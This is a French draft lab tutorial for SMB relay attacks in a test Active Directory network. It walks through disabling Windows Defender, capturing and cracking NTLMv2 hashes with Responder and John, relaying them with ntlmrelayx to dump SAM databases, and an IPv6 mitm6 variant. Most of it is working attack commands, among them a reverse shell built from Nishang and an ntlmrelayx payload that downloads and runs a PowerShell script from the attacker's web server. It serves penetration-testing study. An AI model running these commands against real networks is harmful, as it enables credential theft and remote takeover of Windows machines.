SMB Relay Exploitation - Brouillon

Installation réseau Active Directory:

Quatre appareils connectés sont présents dans le réseau :

Machine A (Windows 10)
Machine B (Windows 10)
Serveur de Domaine (Windows Server 2016)
Machine Attaquante (Parrot)

Étapes à suivre:

Changer le nom des equipement
Les équipements doivent être configurés en mode NAT.
Les rôles suivants doivent être installés sur le serveur DC :
- Service de domaine Active Directory
Une nouvelle forêt nommée "jordan.local" doit être créée.

Les deux PC doivent être connectés au contrôleur de domaine.

Les utilisateurs doivent être créés dans le Active Directory.

Windows Defender doit être désactivé via PowerShell :

Uninstall -WindowsFeature -Name Windows-Defender

SMB Relay est une technique d'attaque utilisée dans les réseaux informatiques, notamment dans les environnements Windows. L'attaque consiste à intercepter et à relayer les communications entre deux machines via le protocole SMB (Server Message Block). L'objectif principal de cette attaque est généralement d'usurper l'identité d'un utilisateur authentifié sur un système distant, en exploitant des faiblesses dans le processus d'authentification SMB. Cela peut permettre à un attaquant d'accéder à des ressources sensibles ou de compromettre des systèmes dans le réseau ciblé.

Par défaut, Samba n'est pas auto-signé, ce qui signifie que l'authenticité de l'origine ne peut pas être vérifiée. Dans un environnement d'entreprise, de nombreuses communications se font via Samba, ce qui expose progressivement de nombreux hachages NTLMv2. Ces hachages peuvent ensuite être capturés et utilisés ultérieurement pour être déchiffrés.

SMB Relay en IPV4:

Exécutez la commande suivante pour utiliser l'outil "responder" :

python3 /usr/share/responder/Responder.py -I ens33 -w -d

il y a plein de taches automatiser dans les reseau d'entreprise par exemple inventaire du software, actualisation antivirus....

Utilisez l'outil John pour décrypter les mots de passe :

john --wordlist=/usr/share/wordlists/rockyou.txt hashes

Utilisation de Crackmapexec :

Utilisez Crackmapexec pour énumérer les équipements réseau :

crackmapexec smb 192.168.71.0/24

On observe bien que les équipements ne sont pas signée

Exemple utilisateur avec plus des privilèges admin:

Effectuez une analyse pour identifier les utilisateurs avec des privilèges élevés, par exemple, l'utilisateur Jordan, membre du groupe Administrateurs :

crackmapexec smb 192.168.71.0/24 -u 'jordan' -p 'Password1'

Si le résultat de cette commande est "pwn3d!", cela signifie que nous avons potentiellement la capacité de récupérer la base de données SAM.

Dumper la SAM :

Désactivez les fonctionnalités SMB et HTTP dans le fichier /usr/share/responder/Responder.conf
Créez un fichier "targets" contenant les adresses IP des équipements ciblés, puis lancez l'outil "responder":

python3 /usr/share/responder/Responder.py -I ens33 -w -d

Utilisez ntlmrelayx pour capturer la SAM :

python /usr/local/bin/ntlmrelayx.py -tf targets.txt -smb2support

Capture de la SAM:

Exécution de commandes via Nishang :

GitHub - samratashok/nishang: Nishang - Offensive PowerShell for red team, penetration testing and offensive security.GitHub

Copiez le script Invoke-PowerShellTCP.ps1 depuis nishang :

cp /opt/nishang/Shells/Invoke-PowerShellTCP.ps1 . 
mv Invoke-PowerShellTCP.ps1 PS.ps1
nvim PS.ps1

Ajoutez à la fin du script la ligne suivante pour établir une connexion inversée :

Invoke-PowerShellTcp -Reverse -IPAddress 192.168.71.128 -Port 4646

Création d'un serveur web et écoute avec nc :

Démarrez un serveur web avec Python sur le port 8000:

python3 -m http.server 8000

Mettez en écoute avec netcat sur le port 4646 :

rlwrap nc -nlvp 4646

Activation responder:

python3 /usr/share/responder/Responder.py -I ens33 -w -d

Infection et connexion à l'utilisateur Pepito :

Utilisez ntlmrelayx pour exécuter un payload PowerShell via le serveur web :

ntlmrelayx.py -tf targets.txt -smb2support -c "powershell IEX(New-Object Net.WebClient).downloadString('http://192.168.71.143:8000/PS.ps1')"

SMB Relay en IPV6:

Demande de configuration du nom de domaine :

Utilisez la commande "mitm6" pour solliciter la configuration du nom de domaine :

mitm6 -d j0rdan.local

Attribution de nouvelles adresses IPv6 locales et de serveurs DNS :

Les équipements obtiennent de nouvelles adresses IPv6 locales ainsi que des serveurs DNS, préparant ainsi le terrain pour la suite des opérations.

Capture de la SAM depuis l'utilisateur Pepeito:

Utilisez ntlmrelayx.py avec l'option IPv6 et d'autres paramètres nécessaires pour capturer la Security Account Manager (SAM) à partir de l'utilisateur Pepeito. Un exemple de commande pourrait être :

ntlmrelayx.py -6 -wh 192.168.71.128 -t smb://192.168.71.151 -socks -debug -smb2support

Vérification de l'administration sur l'équipement de Pepito:

Assurez-vous que le statut d'administration est vrai sur l'équipement de Pepeito.

Vérification de la configuration du proxy : Ouvrez le fichier de configuration, tel que `/etc/proxychange`, pour vérifier que la configuration du proxylist est correcte.

Capture de la SAM à l'aide de proxychains :

Une fois connecté à l'équipement, où le statut admin est confirmé, utilisez proxychains pour capturer la SAM.

proxychains cme smb 192.168.71.151 -u 'JORDAN' -p 'password12345678' -d 'J0RDAN' --sam

Mis à jour il y a 1 an

hashtagQuatre appareils connectés sont présents dans le réseau :

hashtagÉtapes à suivre:

hashtagSMB Relay en IPV4:

hashtagUtilisation de Crackmapexec :

hashtagOn observe bien que les équipements ne sont pas signée

hashtagExemple utilisateur avec plus des privilèges admin:

hashtagDumper la SAM :

hashtagUtilisez ntlmrelayx pour capturer la SAM :

hashtagCapture de la SAM:

hashtagExécution de commandes via Nishang :

hashtagSMB Relay en IPV6:

hashtagDemande de configuration du nom de domaine :

hashtagAttribution de nouvelles adresses IPv6 locales et de serveurs DNS :

hashtagLes équipements obtiennent de nouvelles adresses IPv6 locales ainsi que des serveurs DNS, préparant ainsi le terrain pour la suite des opérations.

hashtagCapture de la SAM depuis l'utilisateur Pepeito:

hashtagUtilisez ntlmrelayx.py avec l'option IPv6 et d'autres paramètres nécessaires pour capturer la Security Account Manager (SAM) à partir de l'utilisateur Pepeito. Un exemple de commande pourrait être :

hashtagVérification de l'administration sur l'équipement de Pepito:

hashtagVérification de la configuration du proxy : Ouvrez le fichier de configuration, tel que /etc/proxychange, pour vérifier que la configuration du proxylist est correcte.

hashtagCapture de la SAM à l'aide de proxychains :